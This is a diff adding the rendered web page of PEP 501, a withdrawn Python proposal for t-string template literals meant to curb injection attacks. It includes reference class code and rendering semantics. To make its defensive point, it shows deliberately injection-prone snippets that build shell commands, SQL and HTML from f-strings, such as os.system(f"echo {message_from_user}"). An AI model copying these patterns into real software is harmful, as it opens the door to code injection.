The datetime methods strftime and isoformat will delegate to the __datetime_strftime__ and __datetime_isoformat__ methods of their tzinfo members whenever those methods are defined.

+

When the datetime.strptime method is given a format string that contains a %Z instruction, it will look up the tzinfo implementation in the registry by the given timezone name and call its __datetime_strptime__ method.

+
+
+
+

Applications

+

This PEP will enable third party implementations of many different timekeeping schemes, including:

+
    +
  • Julian / Microsoft Excel calendar.
  • +
  • “Right” timezones with the leap second support.
  • +
  • French revolutionary calendar (with a lot of work).
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0500.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0501/index.html b/pep-0501/index.html new file mode 100644 index 00000000000..41141b84f98 --- /dev/null +++ b/pep-0501/index.html @@ -0,0 +1,1462 @@ + PEP 501 – General purpose template literal strings | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 501 – General purpose template literal strings

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Nick Humrich <nick at humrich.us>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Requires:
+
701
+
Created:
+
08-Aug-2015
+
Python-Version:
+
3.12
+
Post-History:
+
08-Aug-2015, +05-Sep-2015, +09-Mar-2023
+
Superseded-By:
+
750
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been superseded by PEP 750.

+


+

+
+
+

Abstract

+

Though easy and elegant to use, Python f-strings can be vulnerable to injection attacks when used to construct shell commands, SQL queries, HTML snippets and similar (for example, os.system(f"echo {message_from_user}")). This PEP introduces template literal strings (or “t-strings”), which have syntax and semantics that are similar to f-strings, but with rendering deferred until format() or another template rendering function is called on them. This will allow standard library calls, helper functions and third party tools to safely and intelligently perform appropriate escaping and other string processing on inputs while retaining the usability and convenience of f-strings.

+
+
+

PEP Withdrawal

+

When PEP 750 was first published as a “tagged strings” proposal +(allowing for arbitrary string prefixes), this PEP was kept open to +continue championing the simpler “template literal” approach that +used a single dedicated string prefix to produce instances of a new +“interpolation template” type.

+

The October 2024 updates +to PEP 750 agreed that template strings were a better fit for Python +than the broader tagged strings concept.

+

All of the other concerns the authors of this PEP had with PEP 750 +were also either addressed in those updates, or else left in a state +where they could reasonably be addressed in a future change proposal.

+

Due to the clear improvements in the updated PEP 750 proposal, +this PEP has been withdrawn in favour of PEP 750.

+
+

Important

+

The remainder of this PEP still reflects the state of the tagged strings +proposal in August 2024. It has not been updated to reflect the +October 2024 changes to PEP 750, since the PEP withdrawal makes doing +so redundant.

+
+
+
+

Relationship with other PEPs

+

This PEP is inspired by and builds on top of the f-string syntax first implemented in PEP 498 and formalised in PEP 701.

+

This PEP complements the literal string typing support added to Python’s formal type +system in PEP 675 by introducing a safe way to do dynamic interpolation of runtime +values into security sensitive strings.

+

This PEP competes with some aspects of the tagged string proposal in PEP 750 +(most notably in whether template rendering is expressed as render(t"template literal") +or as render"template literal"), but also shares many common features (after +PEP 750 was published, this PEP was updated with +several new changes +inspired by the tagged strings proposal).

+

This PEP does NOT propose an alternative to PEP 292 for user interface +internationalization use cases (but does note the potential for future syntactic +enhancements aimed at that use case that would benefit from the compiler-supported +value interpolation machinery that this PEP and PEP 750 introduce).

+
+
+

Motivation

+

PEP 498 added new syntactic support for string interpolation that is +transparent to the compiler, allowing name references from the interpolation +operation full access to containing namespaces (as with any other expression), +rather than being limited to explicit name references. These are referred +to in the PEP (and elsewhere) as “f-strings” (a mnemonic for “formatted strings”).

+

Since acceptance of PEP 498, f-strings have become well-established and very popular. +f-strings became even more useful and flexible with the formalised grammar in PEP 701. +While f-strings are great, eager rendering has its limitations. For example, the +eagerness of f-strings has made code like the following unfortunately plausible:

+
os.system(f"echo {message_from_user}")
+
+
+

This kind of code is superficially elegant, but poses a significant problem +if the interpolated value message_from_user is in fact provided by an +untrusted user: it’s an opening for a form of code injection attack, where +the supplied user data has not been properly escaped before being passed to +the os.system call.

+

While the LiteralString type annotation introduced in PEP 675 means that typecheckers +are able to report a type error for this kind of unsafe function usage, those errors don’t +help make it easier to write code that uses safer alternatives (such as +subprocess.run()).

+

To address that problem (and a number of other concerns), this PEP proposes +the complementary introduction of “t-strings” (a mnemonic for “template literal strings”), +where format(t"Message with {data}") would produce the same result as +f"Message with {data}", but the template literal instance can instead be passed +to other template rendering functions which process the contents of the template +differently.

+
+
+

Proposal

+
+

Dedicated template literal syntax

+

This PEP proposes a new string prefix that declares the +string to be a template literal rather than an ordinary string:

+
template = t"Substitute {names:>{field_width}} and {expressions()!r} at runtime"
+
+
+

This would be effectively interpreted as:

+
template = TemplateLiteral(
+    r"Substitute {names:>{field_width}} and {expressions()} at runtime",
+    TemplateLiteralText(r"Substitute "),
+    TemplateLiteralField("names", names, f">{field_width}", ""),
+    TemplateLiteralText(r" and "),
+    TemplateLiteralField("expressions()", expressions(), f"", "r"),
+)
+
+
+

(Note: this is an illustrative example implementation. The exact compile time construction +syntax of types.TemplateLiteral is considered an implementation detail not specified by +the PEP. In particular, the compiler may bypass the default constructor’s runtime logic that +detects consecutive text segments and merges them into a single text segment, as well as +checking the runtime types of all supplied arguments).

+

The __format__ method on types.TemplateLiteral would then +implement the following str.format() inspired semantics:

+
>>> import datetime
+>>> name = 'Jane'
+>>> age = 50
+>>> anniversary = datetime.date(1991, 10, 12)
+>>> format(t'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.')
+'My name is Jane, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
+>>> format(t'She said her name is {name!r}.')
+"She said her name is 'Jane'."
+
+
+

The syntax of template literals would be based on PEP 701, and largely use the same +syntax for the string portion of the template. Aside from using a different prefix, the one +other syntactic change is in the definition and handling of conversion specifiers, both to +allow !() as a standard conversion specifier to request evaluation of a field at +rendering time, and to allow custom renderers to also define custom conversion specifiers.

+

This PEP does not propose to remove or deprecate any of the existing +string formatting mechanisms, as those will remain valuable when formatting +strings that are not present directly in the source code of the application.

+
+
+

Lazy field evaluation conversion specifier

+

In addition to the existing support for the a, r, and s conversion specifiers, +str.format(), str.format_map(), and string.Formatter will be updated +to accept () as a conversion specifier that means “call the interpolated value”.

+

To support application of the standard conversion specifiers in custom template rendering +functions, a new operator.convert_field() function will be added.

+

The signature and behaviour of the format() builtin will also be updated to accept a +conversion specifier as a third optional parameter. If a non-empty conversion specifier +is given, the value will be converted with operator.convert_field() before looking up +the __format__ method.
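An illustrative sketch of the proposed semantics (the () specifier does not exist in current Python, so this is hypothetical behaviour with illustrative output):

>>> counter = iter(range(1, 3)).__next__
>>> "First render: {!()}".format(counter)   # calls counter() -> 1
'First render: 1'
>>> "Second render: {!()}".format(counter)  # calls counter() -> 2
'Second render: 2'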

+
+
+

Custom conversion specifiers

+

To allow additional field-specific directives to be passed to custom rendering functions in +a way that still allows formatting of the template with the default renderer, the conversion +specifier field will be allowed to contain a second ! character.

+

operator.convert_field() and format() (and hence the default +TemplateLiteral.render template rendering method), will ignore that character and any +subsequent text in the conversion specifier field.

+

str.format(), str.format_map(), and string.Formatter will also be +updated to accept (and ignore) custom conversion specifiers.
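For illustration, !upper below is a hypothetical custom specifier suffix (not itself proposed by this PEP), honoured by a custom renderer while remaining invisible to the default one:

template = t"shouting: {name!s!upper}"

format(template)   # default renderer applies "!s" and ignores "!upper"

def shouty(template):
    # Custom field renderer that honours the hypothetical "!upper" suffix
    def render_field(value, format_spec, conversion_spec):
        # The updated format() builtin applies the standard part of the
        # specifier and ignores the custom suffix:
        text = format(value, format_spec or "", conversion_spec or "")
        _, _, custom = (conversion_spec or "").partition("!")
        return text.upper() if custom == "upper" else text
    return template.render(render_field=render_field)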

+
+
+

Template renderer for POSIX shell commands

+

As both a practical demonstration of the benefits of delayed rendering support, and as +a valuable feature in its own right, a new sh template renderer will be added to +the shlex module. This renderer will produce strings where all interpolated fields +are escaped with shlex.quote().

+

The subprocess.Popen API (and higher level APIs that depend on it, such as +subprocess.run()) will be updated to accept interpolation templates and handle +them in accordance with the new shlex.sh renderer.

+
+
+
+

Background

+

This PEP was initially proposed as a competitor to PEP 498. After it became clear that the eager rendering proposal had substantially more immediate support, it then spent several years in a deferred state, pending further experience with PEP 498’s simpler approach of only supporting eager rendering without the additional complexity of also supporting deferred rendering.

+

Since then, f-strings have become very popular and PEP 701 was introduced to tidy up some +rough edges and limitations in their syntax and semantics. The template literal proposal +was updated in 2023 to reflect current knowledge of f-strings, and improvements from +PEP 701.

+

In 2024, PEP 750 was published, proposing a general purpose mechanism for custom tagged +string prefixes, rather than the narrower template literal proposal in this PEP. This PEP +was again updated, both to incorporate new ideas inspired by the tagged strings proposal, +and to describe the perceived benefits of the narrower template literal syntax proposal +in this PEP over the more general tagged string proposal.

+
+

Summary of differences from f-strings

+

The key differences between f-strings and t-strings are:

+
    +
  • the t (template literal) prefix indicates delayed rendering, but +otherwise largely uses the same syntax and semantics as formatted strings
  • +
  • template literals are available at runtime as a new kind of object +(types.TemplateLiteral)
  • +
  • the default rendering used by formatted strings is invoked on a +template literal object by calling format(template) rather than +being done implicitly in the compiled code
  • +
  • unlike f-strings (where conversion specifiers are handled directly in the compiler), +t-string conversion specifiers are handled at rendering time by the rendering function
  • +
  • the new !() conversion specifier indicates that the field expression is a callable +that should be called when using the default format() rendering function. This +specifier is specifically not being added to f-strings (since it is pointless there).
  • +
  • a second ! is allowed in t-string conversion specifiers (with any subsequent text +being ignored) as a way to allow custom template rendering functions to accept custom +conversion specifiers without breaking the default TemplateLiteral.render() +rendering method. This feature is specifically not being added to f-strings (since +it is pointless there).
  • +
  • while f-string f"Message {here}" would be semantically equivalent to +format(t"Message {here}"), f-strings will continue to be supported directly in the +compiler and hence avoid the runtime overhead of actually using the delayed rendering +machinery that is needed for t-strings
  • +
+
+
+

Summary of differences from tagged strings

+

When tagged strings were +first proposed, +there were several notable differences from the proposal in PEP 501 beyond the surface +syntax difference between whether rendering function invocations are written as +render(t"template literal") or as render"template literal".

+

Over the course of the initial PEP 750 discussion, many of those differences were eliminated, +either by PEP 501 adopting that aspect of PEP 750’s proposal (such as lazily applying +conversion specifiers), or by PEP 750 changing to retain some aspect of PEP 501’s proposal +(such as defining a dedicated type to hold template segments rather than representing them +as simple sequences).

+

The main remaining significant difference is that this PEP argues that adding only the +t-string prefix is a sufficient enhancement to give all the desired benefits described in +PEP 750. The expansion to a generalised “tagged string” syntax isn’t necessary, and causes +additional problems that can be avoided.

+

The two PEPs also differ in their proposed approaches to handling lazy evaluation of template +fields.

+

While there are other differences between the two proposals, those differences are more +cosmetic than substantive. In particular:

+
    +
  • this PEP proposes different names for the structural typing protocols
  • +
  • this PEP proposes specific names for the concrete implementation types
  • +
  • this PEP proposes exact details for the proposed APIs of the concrete implementation types +(including concatenation and repetition support, which are not part of the structural +typing protocols)
  • +
  • this PEP proposes changes to the existing format() builtin to make it usable +directly as a template field renderer
  • +
+

The two PEPs also differ in how they make their case for delayed rendering support. This +PEP focuses more on the concrete implementation concept of using template literals to allow +the “interpolation” and “rendering” steps in f-string processing to be separated in time, +and then taking advantage of that to reduce the potential code injection risks associated +with misuse of f-strings. PEP 750 focuses more on the way that native templating support +allows behaviours that are difficult or impossible to achieve via existing string based +templating methods. As with the cosmetic differences noted above, this is more a difference +in style than a difference in substance.

+
+
+
+

Rationale

+

f-strings (PEP 498) made interpolating values into strings with full access to Python’s lexical namespace semantics simpler, but did so at the cost of creating a situation where interpolating values into sensitive targets like SQL queries, shell commands and HTML templates enjoys a much cleaner syntax when handled without regard for code injection attacks than when handled correctly.

+

This PEP proposes to provide the option of delaying the actual rendering +of a template literal to a formatted string to its __format__ method, allowing the use +of other template renderers by passing the template around as a first class object.

+

While very different in the technical details, the +types.TemplateLiteral interface proposed in this PEP is +conceptually quite similar to the FormattableString type underlying the +native interpolation +support introduced in C# 6.0, as well as the +JavaScript template literals +introduced in ES6.

+

While not the original motivation for developing the proposal, many of the benefits for +defining domain specific languages described in PEP 750 also apply to this PEP +(including the potential for per-DSL semantic highlighting in code editors based on the +type specifications of declared template variables and rendering function parameters).

+
+
+

Specification

+

This PEP proposes a new t string prefix that +results in the creation of an instance of a new type, +types.TemplateLiteral.

+

Template literals are Unicode strings (bytes literals are not +permitted), and string literal concatenation operates as normal, with the +entire combined literal forming the template literal.

+

The template string is parsed into literals, expressions, format specifiers, and conversion +specifiers as described for f-strings in PEP 498 and PEP 701. The syntax for conversion +specifiers is relaxed such that arbitrary strings are accepted (excluding those containing +{, } or :) rather than being restricted to valid Python identifiers.

+

However, rather than being rendered directly into a formatted string, these +components are instead organised into instances of new types with the +following behaviour:

+
class TemplateLiteralText(str):
+    # This is a renamed and extended version of the DecodedConcrete type in PEP 750
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+    _raw: str
+
+    def __new__(cls, raw: str):
+        decoded = raw.encode("utf-8").decode("unicode-escape")
+        if decoded == raw:
+            decoded = raw
+        text = super().__new__(cls, decoded)
+        text._raw = raw
+        return text
+
+    @staticmethod
+    def merge(text_segments:Sequence[TemplateLiteralText]) -> TemplateLiteralText:
+        if len(text_segments) == 1:
+            return text_segments[0]
+        return TemplateLiteralText("".join(t._raw for t in text_segments))
+
+    @property
+    def raw(self) -> str:
+        return self._raw
+
+    def __repr__(self) -> str:
+        return f"{type(self).__name__}(r{self._raw!r})"
+
+    def __add__(self, other:Any) -> TemplateLiteralText|NotImplemented:
+        if isinstance(other, TemplateLiteralText):
+            return TemplateLiteralText(self._raw + other._raw)
+        return NotImplemented
+
+
+    def __mul__(self, other:Any) -> TemplateLiteralText|NotImplemented:
+        try:
+            factor = operator.index(other)
+        except TypeError:
+            return NotImplemented
+        return TemplateLiteralText(self._raw * factor)
+    __rmul__ = __mul__
+
+class TemplateLiteralField(NamedTuple):
+    # This is mostly a renamed version of the InterpolationConcrete type in PEP 750
+    # However:
+    #    - value is eagerly evaluated (values were all originally lazy in PEP 750)
+    #    - conversion specifiers are allowed to be arbitrary strings
+    #    - order of fields is adjusted so the text form is the first field and the
+    #      remaining parameters match the updated signature of the `*format` builtin
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+
+    expr: str
+    value: Any
+    format_spec: str | None = None
+    conversion_spec: str | None = None
+
+    def __repr__(self) -> str:
+        return (f"{type(self).__name__}({self.expr}, {self.value!r}, "
+                f"{self.format_spec!r}, {self.conversion_spec!r})")
+
+    def __str__(self) -> str:
+        return format(self.value, self.format_spec or '', self.conversion_spec or '')
+
+    def __format__(self, format_override) -> str:
+        if format_override:
+            format_spec = format_override
+        else:
+            format_spec = self.format_spec
+        return format(self.value, format_spec or '', self.conversion_spec or '')
+
+class TemplateLiteral:
+    # This type corresponds to the TemplateConcrete type in PEP 750
+    # Real type would be implemented in C, this is an API compatible Python equivalent
+    _raw_template: str
+    _segments: tuple[TemplateLiteralText|TemplateLiteralField, ...]
+
+    def __new__(cls, raw_template:str, *segments:TemplateLiteralText|TemplateLiteralField):
+        self = super().__new__(cls)
+        self._raw_template = raw_template
+        # Check if there are any adjacent text segments that need merging
+        # or any empty text segments that need discarding
+        type_err = "Template literal segments must be template literal text or field instances"
+        text_expected = True
+        needs_merge = False
+        for segment in segments:
+            match segment:
+                case TemplateLiteralText():
+                    if not text_expected or not segment:
+                        needs_merge = True
+                        break
+                    text_expected = False
+                case TemplateLiteralField():
+                    text_expected = True
+                case _:
+                    raise TypeError(type_err)
+        if not needs_merge:
+            # Match loop above will have checked all segments
+            self._segments = segments
+            return self
+        # Merge consecutive runs of text fields and drop any empty text fields
+        merged_segments:list[TemplateLiteralText|TemplateLiteralField] = []
+        pending_merge:list[TemplateLiteralText] = []
+        for segment in segments:
+            match segment:
+                case TemplateLiteralText() as text_segment:
+                    if text_segment:
+                        pending_merge.append(text_segment)
+                case TemplateLiteralField():
+                    if pending_merge:
+                        merged_segments.append(TemplateLiteralText.merge(pending_merge))
+                        pending_merge.clear()
+                    merged_segments.append(segment)
+                case _:
+                    # First loop above may not check all segments when a merge is needed
+                    raise TypeError(type_err)
+        if pending_merge:
+            merged_segments.append(TemplateLiteralText.merge(pending_merge))
+            pending_merge.clear()
+        self._segments = tuple(merged_segments)
+        return self
+
+    @property
+    def raw_template(self) -> str:
+        return self._raw_template
+
+    @property
+    def segments(self) -> tuple[TemplateLiteralText|TemplateLiteralField, ...]:
+        return self._segments
+
+    def __len__(self) -> int:
+        return len(self._segments)
+
+    def __iter__(self) -> Iterable[TemplateLiteralText|TemplateLiteralField]:
+        return iter(self._segments)
+
+    # Note: template literals do NOT define any relative ordering
+    def __eq__(self, other):
+        if not isinstance(other, TemplateLiteral):
+            return NotImplemented
+        return (
+            self._raw_template == other._raw_template
+            and self._segments == other._segments
+        )
+
+    def __repr__(self) -> str:
+        return (f"{type(self).__name__}(r{self._raw!r}, "
+                f"{', '.join(map(repr, self._segments))})")
+
+    def __format__(self, format_specifier) -> str:
+        # When formatted, render to a string, and then use string formatting
+        return format(self.render(), format_specifier)
+
+    def render(self, *, render_template=''.join, render_text=str, render_field=format):
+        ...  # See definition of the template rendering semantics below
+
+    def __add__(self, other) -> TemplateLiteral|NotImplemented:
+        if isinstance(other, TemplateLiteral):
+            combined_raw_text = self._raw_template + other._raw_template
+            combined_segments = self._segments + other._segments
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        if isinstance(other, str):
+            # Treat the given string as a new raw text segment
+            combined_raw_text = self._raw_template + other
+            combined_segments = self._segments + (TemplateLiteralText(other),)
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        return NotImplemented
+
+    def __radd__(self, other) -> TemplateLiteral|NotImplemented:
+        if isinstance(other, str):
+            # Treat the given string as a new raw text segment. This effectively
+            # has precedence over string concatenation in CPython due to
+            # https://github.com/python/cpython/issues/55686
+            combined_raw_text = other + self._raw_template
+            combined_segments = (TemplateLiteralText(other),) + self._segments
+            return TemplateLiteral(combined_raw_text, *combined_segments)
+        return NotImplemented
+
+    def __mul__(self, other) -> TemplateLiteral|NotImplemented:
+        try:
+            factor = operator.index(other)
+        except TypeError:
+            return NotImplemented
+        if not self or factor == 1:
+            return self
+        if factor < 1:
+            return TemplateLiteral("")
+        repeated_text = self._raw_template * factor
+        repeated_segments = self._segments * factor
+        return TemplateLiteral(repeated_text, *repeated_segments)
+    __rmul__ = __mul__
+
+
+

(Note: this is an illustrative example implementation, the exact compile time construction +method and internal data management details of types.TemplateLiteral are considered an +implementation detail not specified by the PEP. However, the expected post-construction +behaviour of the public APIs on types.TemplateLiteral instances is specified by the +above code, as is the constructor signature for building template instances at runtime)

+

The result of a template literal expression is an instance of this +type, rather than an already rendered string. Rendering only takes +place when the instance’s render method is called (either directly, or +indirectly via __format__).

+

The compiler will pass the following details to the template literal for +later use:

+
    +
  • a string containing the raw template as written in the source code
  • +
  • a sequence of template segments, with each segment being either:
      +
    • a literal text segment (a regular Python string that also provides access +to its raw form)
    • +
    • a parsed template interpolation field, specifying the text of the interpolated +expression (as a regular string), its evaluated result, the format specifier text +(with any substitution fields eagerly evaluated as an f-string), and the conversion +specifier text (as a regular string)
    • +
    +
  • +
+

The raw template is just the template literal as a string. By default, +it is used to provide a human-readable representation for the +template literal, but template renderers may also use it for other purposes (e.g. as a +cache lookup key).

+

The parsed template structure is taken from PEP 750 and consists of a sequence of +template segments corresponding to the text segments and interpolation fields in the +template string.

+

This approach is designed to allow compilers to fully process each segment of the template +in order, before finally emitting code to pass all of the template segments to the template +literal constructor.

+

For example, assuming the following runtime values:

+
names = ["Alice", "Bob", "Carol", "Eve"]
+field_width = 10
+def expressions():
+    return 42
+
+
+

The template from the proposal section would be represented at runtime as:

+
TemplateLiteral(
+    r"Substitute {names:>{field_width}} and {expressions()!r} at runtime",
+    TemplateLiteralText(r"Substitute "),
+    TemplateLiteralField("names", ["Alice", "Bob", "Carol", "Eve"], ">10", ""),
+    TemplateLiteralText(r" and "),
+    TemplateLiteralField("expressions()", 42, "", "r"),
+)
+
+
+
+

Rendering templates

+

The TemplateLiteral.render implementation defines the rendering +process in terms of the following renderers:

+
    +
  • an overall render_template operation that defines how the sequence of +rendered text and field segments are composed into a fully rendered result. +The default template renderer is string concatenation using ''.join.
  • +
  • a per text segment render_text operation that receives the individual literal +text segments within the template. The default text renderer is the builtin str +constructor.
  • +
  • a per field segment render_field operation that receives the field value, format +specifier, and conversion specifier for substitution fields within the template. The +default field renderer is the format() builtin.
  • +
+

Given the parsed template representation above, the semantics of template rendering would +then be equivalent to the following:

+
def render(self, *, render_template=''.join, render_text=str, render_field=format):
+    rendered_segments = []
+    for segment in self._segments:
+        match segment:
+            case TemplateLiteralText() as text_segment:
+                rendered_segments.append(render_text(text_segment))
+            case TemplateLiteralField() as field_segment:
+                rendered_segments.append(render_field(*field_segment[1:]))
+    return render_template(rendered_segments)
+
+
+
+
+

Format specifiers

+

The syntax and processing of field specifiers in t-strings is defined to be the same as it +is for f-strings.

+

This includes allowing field specifiers to themselves contain f-string substitution fields. +The raw text of the field specifiers (without processing any substitution fields) is +retained as part of the full raw template string.

+

The parsed field specifiers receive the field specifier string with those substitutions +already resolved. The : prefix is also omitted.

+

Aside from separating them out from the substitution expression during parsing, +format specifiers are otherwise treated as opaque strings by the interpolation +template parser - assigning semantics to those (or, alternatively, +prohibiting their use) is handled at rendering time by the field renderer.

+
+
+

Conversion specifiers

+

In addition to the existing support for a, r, and s conversion specifiers, +str.format() and str.format_map() will be updated to accept () as a +conversion specifier that means “call the interpolated value”.

+

Where PEP 701 restricts conversion specifiers to NAME tokens, this PEP will instead +allow FSTRING_MIDDLE tokens (such that only {, } and : are disallowed). This +change is made primarily to support lazy field rendering with the !() conversion +specifier, but also allows custom rendering functions more flexibility when defining their +own conversion specifiers in preference to those defined for the default format() field +renderer.

+

Conversion specifiers are still handled as plain strings, and do NOT support the use +of substitution fields.

+

The parsed conversion specifiers receive the conversion specifier string with the +! prefix omitted.

+

To allow custom template renderers to define their own custom conversion specifiers without +causing the default renderer to fail, conversion specifiers will be permitted to contain a +custom suffix prefixed with a second ! character. That is, !!<custom>, +!a!<custom>, !r!<custom>, !s!<custom>, and !()!<custom> would all be +valid conversion specifiers in a template literal.

+

As described above, the default rendering supports the original !a, !r and !s +conversion specifiers defined in PEP 3101, together with the new !() lazy field +evaluation conversion specifier defined in this PEP. The default rendering ignores any +custom conversion specifier suffixes.

+

The full mapping between the standard conversion specifiers and the special methods called on the interpolated value when the field is rendered is as follows:

+
    +
  • No conversion (empty string): __format__ (with format specifier as parameter)
  • +
  • a: __repr__ (as per the ascii() builtin)
  • +
  • r: __repr__ (as per the repr() builtin)
  • +
  • s: __str__ (as per the str builtin)
  • +
  • (): __call__ (with no parameters)
  • +
+

When a conversion occurs, __format__ (with the format specifier) is called on the result +of the conversion rather than being called on the original object.

+

The changes to format() and the addition of operator.convert_field() make it +straightforward for custom renderers to also support the standard conversion specifiers.

+

f-strings themselves will NOT support the new !() conversion specifier (as it is +redundant when value interpolation and value rendering always occur at the same time). They +also will NOT support the use of custom conversion specifiers (since the rendering function +is known at compile time and doesn’t make use of the custom specifiers).

+
+
+

New field conversion API in the operator module

+

To support application of the standard conversion specifiers in custom template rendering +functions, a new operator.convert_field() function will be added:

+
def convert_field(value, conversion_spec=''):
+    """Apply the given string formatting conversion specifier to the given value"""
+    std_spec, sep, custom_spec = conversion_spec.partition("!")
+    match std_spec:
+        case '':
+            return value
+        case 'a':
+            return ascii(value)
+        case 'r':
+            return repr(value)
+        case 's':
+            return str(value)
+        case '()':
+            return value()
+    if not sep:
+        err = f"Invalid conversion specifier {std_spec!r}"
+    else:
+        err = f"Invalid conversion specifier {std_spec!r} in {conversion_spec!r}"
+    raise ValueError(f"{err}: expected '', 'a', 'r', 's' or '()')
+
+
+
+
+

Conversion specifier parameter added to format()

+

The signature and behaviour of the format() builtin will be updated:

+
def format(value, format_spec='', conversion_spec=''):
+    if conversion_spec:
+        value_to_format = operator.convert_field(value, conversion_spec)
+    else:
+        value_to_format = value
+    return type(value_to_format).__format__(value_to_format, format_spec)
+
+
+

If a non-empty conversion specifier is given, the value will be converted with +operator.convert_field() before looking up the __format__ method.

+

The signature of the __format__ special method does NOT change (only format specifiers +are handled by the object being formatted).

+
+
+

Structural typing and duck typing

+

To allow custom renderers to accept alternative interpolation template implementations +(rather than being tightly coupled to the native template literal types), the +following structural protocols will be added to the typing module:

+
@runtime_checkable
+class TemplateText(Protocol):
+    # Renamed version of PEP 750's Decoded protocol
+    def __str__(self) -> str:
+        ...
+
+    raw: str
+
+@runtime_checkable
+class TemplateField(Protocol):
+    # Renamed and modified version of PEP 750's Interpolation protocol
+    def __len__(self):
+        ...
+
+    def __getitem__(self, index: int):
+        ...
+
+    def __str__(self) -> str:
+        ...
+
+    expr: str
+    value: Any
+    format_spec: str | None = None
+    conversion_spec: str | None = None
+
+@runtime_checkable
+class InterpolationTemplate(Protocol):
+    # Corresponds to PEP 750's Template protocol
+    def __iter__(self) -> Iterable[TemplateText|TemplateField]:
+        ...
+
+    raw_template: str
+
+
+

Note that the structural protocol APIs are substantially narrower than the full +implementation APIs defined for TemplateLiteralText, TemplateLiteralField, +and TemplateLiteral.

+

Code that wants to accept interpolation templates and define specific handling for them +without introducing a dependency on the typing module, or restricting the code to +handling the concrete template literal types, should instead perform an attribute +existence check on raw_template.
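A minimal sketch of that duck-typed check (render_or_passthrough is a hypothetical helper name):

def render_or_passthrough(arg):
    # Attribute-existence check suggested above: no typing import needed,
    # and any conforming template implementation is accepted.
    if hasattr(arg, "raw_template"):
        return format(arg)   # render with the default renderer
    return str(arg)          # plain strings pass through unchanged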

+
+
+

Writing custom renderers

+

Writing a custom renderer doesn’t require any special syntax. Instead, +custom renderers are ordinary callables that process an interpolation +template directly either by calling the render() method with alternate +render_template, render_text, and/or render_field implementations, or by +accessing the template’s data attributes directly.

+

For example, the following function would render a template using objects’ +repr implementations rather than their native formatting support:

+
def repr_format(template):
+    def render_field(value, format_spec, conversion_spec):
+        converted_value = operator.convert_field(value, conversion_spec)
+        return format(repr(converted_value), format_spec)
+    return template.render(render_field=render_field)
+
+
+

The custom renderer shown respects the conversion specifiers in the original template, but it is also possible to ignore them and render the interpolated values directly:

+
def input_repr_format(template):
+    def render_field(value, format_spec, __):
+        return format(repr(value), format_spec)
+    return template.render(render_field=render_field)
+
+
+

When writing custom renderers, note that the return type of the overall +rendering operation is determined by the return type of the passed in render_template +callable. While this will still be a string for formatting related use cases, producing +non-string objects is permitted. For example, a custom SQL +template renderer could involve an sqlalchemy.sql.text call that produces an +SQL Alchemy query object. +A subprocess invocation related template renderer could produce a string sequence suitable +for passing to subprocess.run, or it could even call subprocess.run directly, and +return the result.

+

Non-strings may also be returned from render_text and render_field, as long as +they are paired with a render_template implementation that expects that behaviour.

+

Custom renderers using the pattern matching style described in PEP 750 are also supported:

+
# Use the structural typing protocols rather than the concrete implementation types
+from typing import InterpolationTemplate, TemplateText, TemplateField
+
+def greet(template: InterpolationTemplate) -> str:
+    """Render an interpolation template using structural pattern matching."""
+    result = []
+    for segment in template:
+        match segment:
+            case TemplateText() as text_segment:
+                result.append(text_segment)
+            case TemplateField() as field_segment:
+                result.append(str(field_segment).upper())
+    return f"{''.join(result)}!"
+
+
+
+
+

Expression evaluation

+

As with f-strings, the subexpressions that are extracted from the interpolation +template are evaluated in the context where the template literal +appears. This means the expression has full access to local, nonlocal and global variables. +Any valid Python expression can be used inside {}, including +function and method calls.

+

Because the substitution expressions are evaluated where the string appears in the source code, there are no additional security concerns related to the contents of the expression itself, as you could have just written the same expression inline and formatted the result at runtime:

+
>>> bar=10
+>>> def foo(data):
+...   return data + 20
+...
+>>> format(t'input={bar}, output={foo(bar)}')
+'input=10, output=30'
+
+
+

Is essentially equivalent to:

+
>>> 'input={}, output={}'.format(bar, foo(bar))
+'input=10, output=30'
+
+
+
+
+

Handling code injection attacks

+

The PEP 498 formatted string syntax makes it potentially attractive to write +code like the following:

+
runquery(f"SELECT {column} FROM {table};")
+runcommand(f"cat {filename}")
+return_response(f"<html><body>{response.body}</body></html>")
+
+
+

These all represent potential vectors for code injection attacks, if any of the +variables being interpolated happen to come from an untrusted source. The +specific proposal in this PEP is designed to make it straightforward to write +use case specific renderers that take care of quoting interpolated values +appropriately for the relevant security context:

+
runquery(sql(t"SELECT {column} FROM {table} WHERE column={value};"))
+runcommand(sh(t"cat {filename}"))
+return_response(html(t"<html><body>{response.body}</body></html>"))
+
+
+

This PEP does not cover adding all such renderers to the standard library +immediately (though one for shell escaping is proposed), but rather proposes to ensure +that they can be readily provided by third party libraries, and potentially incorporated +into the standard library at a later date.

+

Over time, it is expected that APIs processing potentially dangerous string inputs may be +updated to accept interpolation templates natively, allowing problematic code examples to +be fixed simply by replacing the f string prefix with a t:

+
runquery(t"SELECT {column} FROM {table};")
+runcommand(t"cat {filename}")
+return_response(t"<html><body>{response.body}</body></html>")
+
+
+

It is proposed that a renderer be included in the shlex module, aiming to offer a more POSIX shell style experience for accessing external programs, without the significant risks posed by running os.system or enabling the system shell when using the subprocess module APIs. This renderer will provide an interface for running external programs inspired by that offered by the Julia programming language, only with the backtick based `cat $filename` syntax replaced by t"cat {filename}" style template literals. See more in the Renderer for shell escaping added to shlex section.

+
+
+

Error handling

+

Either compile time or run time errors can occur when processing interpolation +expressions. Compile time errors are limited to those errors that can be +detected when parsing a template string into its component tuples. These +errors all raise SyntaxError.

+

Unmatched braces:

+
>>> t'x={x'
+  File "<stdin>", line 1
+      t'x={x'
+         ^
+SyntaxError: missing '}' in template literal expression
+
+
+

Invalid expressions:

+
>>> t'x={!x}'
+  File "<fstring>", line 1
+    !x
+    ^
+SyntaxError: invalid syntax
+
+
+

